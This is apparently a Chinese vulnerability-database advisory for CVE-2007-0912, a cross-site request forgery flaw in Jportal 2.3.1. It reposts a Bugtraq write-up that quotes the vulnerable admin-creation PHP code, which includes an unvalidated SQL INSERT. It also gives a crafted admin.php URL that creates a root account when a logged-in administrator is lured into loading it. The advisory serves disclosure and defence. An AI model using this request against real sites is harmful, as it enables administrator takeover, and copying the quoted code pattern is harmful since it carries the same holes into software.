Jportal 'admin.adm.php'跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191701 漏洞类型 跨站请求伪造
发布时间 2007-02-13 更新时间 2007-02-13
CVE编号 CVE-2007-0912 CNNVD-ID CNNVD-200702-271
漏洞平台 N/A CVSS评分 9.3
|漏洞来源
https://www.securityfocus.com/bid/86608
https://cxsecurity.com/issue/WLB-2007020042
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-271
|漏洞详情
Jportal2.3.1版本及其可能的早期版本的脚本admin/admin.adm.php中存在跨站请求伪造漏洞。远程攻击者通过欺骗管理员,访问一个具有修改过的对admin/admin.adm.php的URL,执行特权操作。
|漏洞EXP
Type: CSRF Attack / Input Validation Error
Remote: Yes
Version: 2.3.1 (very possible, that older versions are vulnerable too)
Problem is in admin/admin.adm.php:

function add_admin() {

global $name, $mail, $nick_, $action, $user_tbl, $access;
 global $nick, $PHP_SELF, $_pass, $pass_, $acce, $op, $goto;

if($access=='root') {

if($_pass==$pass_) {

if($acce[news]=='') $acce[news]='n';
if($acce[info]=='') $acce[info]='n';
if($acce[art]=='') $acce[art]='n';
if($acce[sonda]=='') $acce[sonda]='n';
if($acce[link]=='') $acce[link]='n';
if($acce[forum]=='') $acce[forum]='n';
if($acce[comm]=='') $acce[comm]='n';
if($acce[menu]=='') $acce[menu]='n';
if($acce[bann]=='') $acce[bann]='n';
if($acce[topic]=='') $acce[topic]='n';
if($acce[file]=='') $acce[file]='n';

if($acce[root]<>'t') {

$acce_ = $acce[news].'-'.$acce[art].'-'.$acce[info].'-'.$acce[sonda].'-'.$acce[li
nk].'-'.$acce[forum].'-'.$acce[comm].'-'.$acce[file].'-'.$acce[menu].'-'
.$acce[bann].'-'.$acce[topic];

} else {

$acce_ = 'root';

}

$query = "INSERT INTO $user_tbl VALUES(NULL, '$nick_', '".md5($_pass)."', '$name', now(), '$acce_', '$mail', 1)";
 $result = mysql_query($query);

add_log('dodano administratora (ID '.mysql_insert_id().')');

if($goto=='')
header("Location: admin.php?op=$op");
else
header("Location: $goto");
exit;

As we can see, all variables comes from "nowhere" (i.e. it can be POST, GET, even COOKIE) and it's not checked, if script was launched by admin through admin panel or not. Due to this fact, if only admin has logged in and not logged out, if we let him send prepared request, we can get a root account (For example using our profile avatar).

http://vulnerable_jportal/admin.php?op=admin&name=admin&mail=&nick_=admi
n&_pass=pass&pass_=haslo&acce%5Broot%5D=t&ok=dodaj&goto=&cmd=add

gives us root account with name "admin" and password "pass".

D&#380;itu
dzitu (at) poczta (dot) fm [email concealed]
|受影响的产品
JPortal Jportal Web Server 2.3.1
|参考资料

来源:BUGTRAQ
名称:20070211Jportal2.3.1CSRFvulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/459827/100/0/threaded
来源:OSVDB
名称:33712
链接:http://osvdb.org/33712
来源:XF
名称:jportal-admin-csrf(32458)
链接:http://xforce.iss.net/xforce/xfdb/32458
来源:SREASON
名称:2239
链接:http://securityreason.com/securityalert/2239